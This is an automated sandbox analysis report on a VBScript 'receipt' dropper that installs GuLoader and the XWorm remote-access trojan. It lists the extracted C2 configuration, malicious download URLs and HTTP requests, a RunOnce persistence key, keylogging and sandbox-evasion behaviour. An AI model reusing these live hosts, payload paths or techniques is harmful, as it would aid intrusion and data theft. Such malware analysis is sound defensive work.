Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c56D7_Receipt.vbs

Overview

General Information

Sample name:c56D7_Receipt.vbs
Analysis ID:1534152
MD5:878ba89eaad87f86c7ff4e5fee1e1823
SHA1:8f9496d5da92c9a0f64ffe5aa0ee0da259a9da1b
SHA256:30c4d81a0075e27984f768fa73c43240f5b14724a84a5057c15c99114b4aac15
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 7472 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • filaucioso.bat (PID: 7576 cmdline: "C:\ProgramData\filaucioso.bat" MD5: F3A3332B13BAA50C41644B86EFDF0FE4)
      • filaucioso.bat (PID: 7924 cmdline: "C:\ProgramData\filaucioso.bat" MD5: F3A3332B13BAA50C41644B86EFDF0FE4)
  • cleanup
{"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000001.00000002.2030976668.000000000503C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: filaucioso.bat PID: 7924JoeSecurity_XWormYara detected XWormJoe Security

        System Summary

        barindex
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif, EventID: 13, EventType: SetValue, Image: C:\ProgramData\filaucioso.bat, ProcessId: 7924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Afmystificeringen
        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 103.53.40.62, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7472, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", ProcessId: 7472, ProcessName: wscript.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif, EventID: 13, EventType: SetValue, Image: C:\ProgramData\filaucioso.bat, ProcessId: 7924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Afmystificeringen
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\ProgramData\filaucioso.bat" , CommandLine: "C:\ProgramData\filaucioso.bat" , CommandLine|base64offset|contains: , Image: C:\ProgramData\filaucioso.bat, NewProcessName: C:\ProgramData\filaucioso.bat, OriginalFileName: C:\ProgramData\filaucioso.bat, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7472, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\ProgramData\filaucioso.bat" , ProcessId: 7576, ProcessName: filaucioso.bat
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 103.53.40.62, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7472, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs", ProcessId: 7472, ProcessName: wscript.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T16:37:16.145747+020020198231Exploit Kit Activity Detected103.53.40.62443192.168.2.449730TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T16:38:24.736567+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:25.524375+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:37.999786+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:50.489302+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:54.938606+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:54.982382+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:39:02.941989+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:39:08.007586+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:39:12.958478+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:39:24.732378+020028528701Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T16:38:24.736567+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:54.938606+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:38:54.982382+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        2024-10-15T16:39:24.732378+020028528741Malware Command and Control Activity Detected12.221.146.1389402192.168.2.449755TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-15T16:38:25.278446+020028559241Malware Command and Control Activity Detected192.168.2.44975512.221.146.1389402TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xwor3july.duckdns.org"], "Port": "9402", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_004062F0 FindFirstFileA,FindClose,1_2_004062F0
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004057B5
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00402765 FindFirstFileA,1_2_00402765
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_004062F0 FindFirstFileA,FindClose,5_2_004062F0
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057B5

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 12.221.146.138:9402 -> 192.168.2.4:49755
        Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 12.221.146.138:9402 -> 192.168.2.4:49755
        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49755 -> 12.221.146.138:9402
        Source: Network trafficSuricata IDS: 2019823 - Severity 1 - ET EXPLOIT_KIT WinHttpRequest Downloading EXE Non-Port 80 (Likely Exploit Kit) : 103.53.40.62:443 -> 192.168.2.4:49730
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 103.53.40.62 443Jump to behavior
        Source: Malware configuration extractorURLs: xwor3july.duckdns.org
        Source: unknownDNS query: name: xwor3july.duckdns.org
        Source: global trafficTCP traffic: 192.168.2.4:49755 -> 12.221.146.138:9402
        Source: Joe Sandbox ViewIP Address: 12.221.146.138 12.221.146.138
        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
        Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /Motocrossbanerne37.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: apslline.com
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /Motocrossbanerne37.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: apslline.com
        Source: global trafficHTTP traffic detected: GET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: apslline.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: apslline.com
        Source: global trafficDNS traffic detected: DNS query: xwor3july.duckdns.org
        Source: filaucioso.bat, filaucioso.bat, 00000005.00000000.2022571987.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat.0.dr, Busaos.pif.5.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: wscript.exe, 00000000.00000003.1778774215.0000020E79077000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000001.00000000.1781880896.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat, 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmp, filaucioso.bat, 00000005.00000000.2022571987.000000000040A000.00000008.00000001.01000000.00000005.sdmp, filaucioso.bat.0.dr, Busaos.pif.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: filaucioso.bat, 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: wscript.exe, 00000000.00000002.1792928891.0000020E78FA4000.00000004.00000020.00020000.00000000.sdmp, filaucioso.bat, 00000005.00000002.3009633630.0000000003476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/
        Source: filaucioso.bat, 00000005.00000002.3028675290.0000000032A50000.00000004.00001000.00020000.00000000.sdmp, filaucioso.bat, 00000005.00000002.3009633630.0000000003476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin
        Source: wscript.exe, wscript.exe, 00000000.00000003.1714870474.0000020E78C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715125263.0000020E78BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792928891.0000020E78FA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787973256.0000020E78BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792671599.0000020E76FBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1791188992.0000020E78BE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792604906.0000020E76FB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790076467.0000020E76E71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790076467.0000020E76DEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715027425.0000020E76E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1791162890.0000020E76FBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1788098189.0000020E76FBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1791638449.0000020E76FBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792192545.0000020E76E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/Motocrossbanerne37.pif
        Source: wscript.exe, 00000000.00000003.1790895980.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716344400.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1787328230.0000020E78C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790025540.0000020E78C04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715545165.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1716569906.0000020E78C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/Motocrossbanerne37.pif:U
        Source: wscript.exe, 00000000.00000003.1791259002.0000020E78E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/Motocrossbanerne37.pifQ
        Source: wscript.exe, 00000000.00000002.1792100540.0000020E76DB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com/Motocrossbanerne37.pifk
        Source: wscript.exe, 00000000.00000003.1790076467.0000020E76E71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1792192545.0000020E76E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1790768918.0000020E76E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apslline.com:443/Motocrossbanerne37.pif
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 103.53.40.62:443 -> 192.168.2.4:49737 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: C:\ProgramData\filaucioso.batWindows user hook set: 0 keyboard low level C:\ProgramData\filaucioso.batJump to behavior
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,1_2_00405252

        System Summary

        barindex
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403248
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403289
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_6E3A1A981_2_6E3A1A98
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_000D6F245_2_000D6F24
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_000DEB985_2_000DEB98
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_000D0EB85_2_000D0EB8
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_000D711B5_2_000D711B
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_000DD8E85_2_000DD8E8
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366CB4E85_2_366CB4E8
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366C15615_2_366C1561
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366C1E105_2_366C1E10
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366C6FC95_2_366C6FC9
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366C02B85_2_366C02B8
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_366CCDB05_2_366CCDB0
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_36843EC65_2_36843EC6
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_36840F505_2_36840F50
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_36841C285_2_36841C28
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_36840C085_2_36840C08
        Source: C:\ProgramData\filaucioso.batCode function: String function: 00402B2C appears 50 times
        Source: c56D7_Receipt.vbsInitial sample: Strings found which are bigger than 50
        Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@5/28@5/2
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403248
        Source: C:\ProgramData\filaucioso.batCode function: 5_2_00403289 lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403289
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_0040450D GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040450D
        Source: C:\ProgramData\filaucioso.batCode function: 1_2_00402138 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,1_2_00402138
        Source: C:\ProgramData\filaucioso.batMutant created: NULL
        Source: C:\ProgramData\filaucioso.batMutant created: \Sessions\1\BaseNamedObjects\JIs7HXfvmVwG8wtR
        Source: C:\ProgramData\filaucioso.batFile created: C:\Users\user\AppData\Local\Temp\nsu12FA.tmpJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat"
        Source: C:\ProgramData\filaucioso.batProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat" Jump to behavior
        Source: C:\ProgramData\filaucioso.batProcess created: C:\ProgramData\filaucioso.bat "C:\ProgramData\filaucioso.bat" Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
